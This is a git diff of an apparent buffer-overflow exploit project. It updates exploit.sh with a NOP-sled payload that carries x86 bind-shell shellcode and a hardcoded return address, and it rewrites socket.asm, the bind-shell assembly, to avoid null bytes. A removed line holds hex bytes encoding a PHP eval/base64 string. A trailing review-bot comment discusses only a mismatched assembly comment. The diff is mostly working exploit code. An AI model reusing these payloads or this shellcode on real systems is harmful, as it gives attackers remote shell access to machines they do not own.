-rwxr-xr-x | exploit.sh | 10 | ||||
-rw-r--r-- | shellcode/simple2.c | 9 | ||||
-rw-r--r-- | shellcode/socket.asm | 17 |
3 files changed, 15 insertions, 21 deletions
@@ -5,10 +5,8 @@ # 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr -./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'` +#./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'` -# shellcode/simple.c -#./overflow `python -c 'print "\x90"*117 + "\xbb\xd3\x92\x56\xa9\xd9\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0f\x31\x5a\x12\x83\xc2\x04\x03\x89\x9c\xb4\x5c\xc6\x5f\x38\x9f\x18\xa0\x39\x9f\x0c\xa0\x39\x9f\x2c\xa0\x39\x9f\x2d\xda\x6b\x9f\x2c\x62\x9c\x9e\x35\x9e\x9b\xa8\xd9\x9f\xa3\xa8\xcd\x9f\xa3\xa8\xf1\x9f\xa3\xa8\xd1\x5f\x5c\x57\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8" + "\x90"*104 + "\x8c\xd3\xff\xff"'` - -# shellcode/simple2.c (257 bytes) -#./overflow `python -c 'print "\x90"*117 + 
"\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x53\x49\x31\x30\x4a\x50\x71\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x41\x67\x41\x41\x41\x4c\x6f\x47\x41\x41\x41\x41\x75\x41\x51\x41\x41\x41\x49\x50\x42\x63\x4e\x51\x36\x4f\x50\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x72\x2e\x63\x68\x72\x28\x34\x33\x29\x2e\x51\x41\x55\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x46\x36\x55\x67\x41\x42\x65\x42\x41\x42\x47\x77\x77\x48\x43\x4a\x41\x42\x41\x41\x41\x55\x41\x41\x41\x41\x48\x41\x41\x41\x41\x4d\x44\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x38\x58\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x55\x41\x41\x41\x41\x4e\x41\x41\x41\x41\x4c\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x63\x68\x72\x28\x34\x37\x29\x2e\x38\x49\x41\x41\x41\x41\x41\x45\x45\x4f\x45\x41\x41\x41\x41\x41\x41\x29\x29\x3b" + "\x90"*104 + "\x8c\xd3\xff\xff"'` +# bindshell +# 85 bytes NOP + 134 bytes shellcode + 85 bytes NOP +./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x8c\xd3\xff\xff"'` diff --git a/shellcode/simple2.c b/shellcode/simple2.c deleted file mode 100644 index 341b2de..0000000 --- a/shellcode/simple2.c +++ /dev/null 
@@ -1,9 +0,0 @@ -#include <stdio.h> -#include <stdlib.h> - -int _start(void) { - while (1) { - //printf("Shellcode!\n"); - } - return (0); -} diff --git a/shellcode/socket.asm b/shellcode/socket.asm index 76b8103..1cbd9d4 100644 --- a/shellcode/socket.asm +++ b/shellcode/socket.asm @@ -3,9 +3,10 @@ BITS 32 ; socket() xor eax,eax ; zero out eax +xor ebx,ebx ; " " ebx push eax ; push 0x0 on the stack: arg3(protocol) -> 0 -mov ebx,0x01 ; socket sub-syscall: 0x01 -> socket() -push 0x01 ; socket type: 0x01 -> SOCK_STREAM +mov bl,0x1 ; socket sub-syscall: 0x01 -> socket() +push ebx ; socket type: 0x01 -> SOCK_STREAM push 0x02 ; socket domain: 0x02 -> AF_INET mov ecx,esp ; let ecx point to our structure above mov al,0x66 ; socketcall syscall 0x66 @@ -25,7 +26,8 @@ push edx ; arg1: push sockfd ; arg2 mov ecx,esp ; move stack pointer to reg (conform to socketcall) ; arg1 -mov ebx,0x02 ; set socket subcall to 0x03 (bind) +xor ebx,ebx +mov bl,0x2 ; set socket subcall to 0x03 (bind) mov al,0x66 ; socketcall syscall int 0x80 ; let the kernel do the stuff @@ -35,7 +37,8 @@ push eax ; backlog push edx ; sockfd mov ecx,esp ; save stackptr mov al,0x66 ; socketcall() -mov ebx,0x4 ; socketcall 0x4 -> listen() +xor ebx,ebx +mov bl,0x4 ; socketcall 0x4 -> listen() int 0x80 ; kernel mode ; accept() @@ -49,7 +52,8 @@ push esp ; pointer to sock addrlen push ecx ; push sockaddr_in push edx ; sockfd mov ecx,esp -mov ebx,0x5 +xor ebx,ebx +mov bl,0x5 mov al,0x66 int 0x80 @@ -78,5 +82,6 @@ int 0x80 ; exit() mov al,0x1 ; exit syscall -mov ebx,0x42 ; return code +xor ebx,ebx +mov bl,0x42 ; return code int 0x80 ; kernel mode |
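Review bot: In the bind hunk of shellcode/socket.asm the rewritten line `mov bl,0x2 ; set socket subcall to 0x03 (bind)` carries a comment that disagrees with its own immediate, and the commit touches the line without correcting it; since the neighbouring hunks document socket as 0x01, listen as 0x4 and accept as 0x5, the value looks right and the comment is the stale part, so `mov bl,0x2 ; set socket subcall to 0x02 (bind)` would make the two agree. In the first hunk the added `xor ebx,ebx ; " " ebx` uses ditto marks that only read correctly next to the `xor eax,eax ; zero out eax` line above it; `xor ebx,ebx ; zero out ebx` stands on its own. The same `xor ebx,ebx` / `mov bl,…` rewrite in the listen, accept and exit hunks keeps comments consistent with their immediates, so only the bind line needs the fix. The full `; bind()` block these lines belong to starts and ends outside the hunk.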